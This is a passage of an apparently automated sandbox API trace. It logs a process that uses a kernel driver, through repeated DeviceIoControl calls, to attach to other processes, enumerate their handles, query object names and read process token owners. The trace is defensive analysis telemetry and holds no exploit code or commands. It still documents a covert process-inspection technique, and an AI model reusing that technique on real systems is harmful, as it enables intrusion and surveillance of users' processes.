KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.134] ObReferenceObjectByHandle (in: Handle=0x454, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a07b20, HandleInformation=0x0) returned 0x0 [0245.134] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.134] PsReleaseProcessExitSynchronization () returned 0x2 [0245.134] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.134] ObQueryNameString (in: Object=0xfffffa8003a07b20, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.134] ObfDereferenceObject (Object=0xfffffa8003a07b20) returned 0x2 [0245.134] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.134] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.134] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.134] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.134] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.134] PsAcquireProcessExitSynchronization () returned 0x0 [0245.135] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.135] ObReferenceObjectByHandle (in: Handle=0x4a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034ed070, HandleInformation=0x0) returned 0x0 [0245.135] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.135] PsReleaseProcessExitSynchronization () returned 0x2 [0245.135] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.135] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.135] ObfDereferenceObject (Object=0xfffffa80034ed070) returned 0x1 [0245.135] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.135] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.135] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.135] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.135] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.135] PsAcquireProcessExitSynchronization () returned 0x0 [0245.135] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.135] ObReferenceObjectByHandle (in: Handle=0x4d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0245.135] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.135] PsReleaseProcessExitSynchronization () returned 0x2 [0245.135] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.135] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.135] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0245.135] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.135] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.135] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.135] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.135] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.135] PsAcquireProcessExitSynchronization () returned 0x0 [0245.135] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.135] ObReferenceObjectByHandle (in: Handle=0x558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800368b100, HandleInformation=0x0) returned 0x0 [0245.135] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.136] PsReleaseProcessExitSynchronization () returned 0x2 [0245.136] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.136] ObQueryNameString (in: Object=0xfffffa800368b100, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.136] ObfDereferenceObject (Object=0xfffffa800368b100) returned 0x1 [0245.136] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.136] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.136] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.136] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.136] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.136] PsAcquireProcessExitSynchronization () returned 0x0 [0245.136] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.136] ObReferenceObjectByHandle (in: Handle=0x570, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003acd3a0, HandleInformation=0x0) returned 0x0 [0245.136] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.136] PsReleaseProcessExitSynchronization () returned 0x2 [0245.136] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.136] ObQueryNameString (in: Object=0xfffffa8003acd3a0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.136] ObfDereferenceObject (Object=0xfffffa8003acd3a0) returned 0x1 [0245.136] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.137] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.137] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0245.137] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.137] PsAcquireProcessExitSynchronization () returned 0x0 [0245.137] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.137] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e98dd0, HandleInformation=0x0) returned 0x0 [0245.137] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.137] PsReleaseProcessExitSynchronization () returned 0x2 [0245.137] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.137] ObQueryNameString (in: Object=0xfffffa8001e98dd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.137] ObfDereferenceObject (Object=0xfffffa8001e98dd0) returned 0x1 [0245.137] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.137] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.137] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.137] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0245.137] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.137] PsAcquireProcessExitSynchronization () returned 0x0 [0245.137] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.137] ObReferenceObjectByHandle (in: Handle=0x5d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028187c0, HandleInformation=0x0) returned 0x0 [0245.137] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.137] PsReleaseProcessExitSynchronization () returned 0x2 [0245.137] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.137] ObQueryNameString (in: Object=0xfffffa80028187c0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.138] ObfDereferenceObject (Object=0xfffffa80028187c0) returned 0x1 [0245.138] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.138] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.138] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.138] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.138] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.138] PsAcquireProcessExitSynchronization () returned 0x0 [0245.138] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.138] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00139ed40, HandleInformation=0x0) returned 0x0 [0245.138] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.138] PsReleaseProcessExitSynchronization () returned 0x2 [0245.138] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.138] ObQueryNameString (in: Object=0xfffff8a00139ed40, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.138] ObfDereferenceObject (Object=0xfffff8a00139ed40) returned 0x1 [0245.138] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.138] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.138] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.138] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xc6, lpOverlapped=0x0) returned 1 [0245.138] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.138] PsAcquireProcessExitSynchronization () returned 0x0 [0245.138] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.138] ObReferenceObjectByHandle (in: Handle=0x5ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002158070, HandleInformation=0x0) returned 0x0 [0245.138] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.138] PsReleaseProcessExitSynchronization () returned 0x2 [0245.139] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.139] ObQueryNameString (in: Object=0xfffffa8002158070, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.139] ObfDereferenceObject (Object=0xfffffa8002158070) returned 0x1 [0245.139] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.139] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.139] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.139] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.139] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.139] PsAcquireProcessExitSynchronization () returned 0x0 [0245.139] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.139] ObReferenceObjectByHandle (in: Handle=0x5fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001957190, HandleInformation=0x0) returned 0x0 [0245.139] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.139] PsReleaseProcessExitSynchronization () returned 0x2 [0245.139] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.139] ObQueryNameString (in: Object=0xfffff8a001957190, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.139] ObfDereferenceObject (Object=0xfffff8a001957190) returned 0x1 [0245.139] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.139] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x444) returned 0xc8 [0245.139] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.139] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80036e4060, HandleInformation=0x0) returned 0x0 [0245.139] ObOpenObjectByPointer (in: Object=0xfffffa80036e4060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0245.139] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2d [0245.139] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002ffa140 | out: TokenHandle=0xfffffa8002ffa140*=0xc4) returned 0x0 [0245.139] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0245.140] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.140] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.140] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.141] CloseHandle (hObject=0xc4) returned 1 [0245.141] CloseHandle (hObject=0xc8) returned 1 [0245.142] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.142] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.142] PsLookupProcessByProcessId (in: ProcessId=0x444, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.142] PsAcquireProcessExitSynchronization () returned 0x0 [0245.142] KeStackAttachProcess (in: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880053c85d0) [0245.142] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036e5270, HandleInformation=0x0) returned 0x0 [0245.142] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.142] PsReleaseProcessExitSynchronization () returned 0x2 [0245.142] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2b [0245.142] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.142] ObfDereferenceObject (Object=0xfffffa80036e5270) returned 0x1 [0245.142] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.142] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.142] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.142] PsLookupProcessByProcessId (in: ProcessId=0x444, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.142] PsAcquireProcessExitSynchronization () returned 0x0 [0245.142] KeStackAttachProcess (in: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036e4060, ApcState=0xfffff880053c85d0) [0245.142] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.142] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.142] PsReleaseProcessExitSynchronization () returned 0x2 [0245.142] ObfDereferenceObject (Object=0xfffffa80036e4060) returned 0x2b [0245.142] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.142] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0245.143] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.143] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x454) returned 0xc8 [0245.143] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.143] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80036d0060, HandleInformation=0x0) returned 0x0 [0245.143] ObOpenObjectByPointer (in: Object=0xfffffa80036d0060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0245.143] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18c [0245.143] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002ffa140 | out: TokenHandle=0xfffffa8002ffa140*=0xc4) returned 0x0 [0245.143] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0245.143] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.143] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.143] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.145] CloseHandle (hObject=0xc4) returned 1 [0245.145] CloseHandle (hObject=0xc8) returned 1 [0245.145] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.145] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.145] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.145] PsAcquireProcessExitSynchronization () returned 0x0 [0245.145] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.145] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036cf730, HandleInformation=0x0) returned 0x0 [0245.145] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.145] PsReleaseProcessExitSynchronization () returned 0x2 [0245.145] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.145] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.145] ObfDereferenceObject (Object=0xfffffa80036cf730) returned 0x1 [0245.145] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.146] RtlAllocateHeap 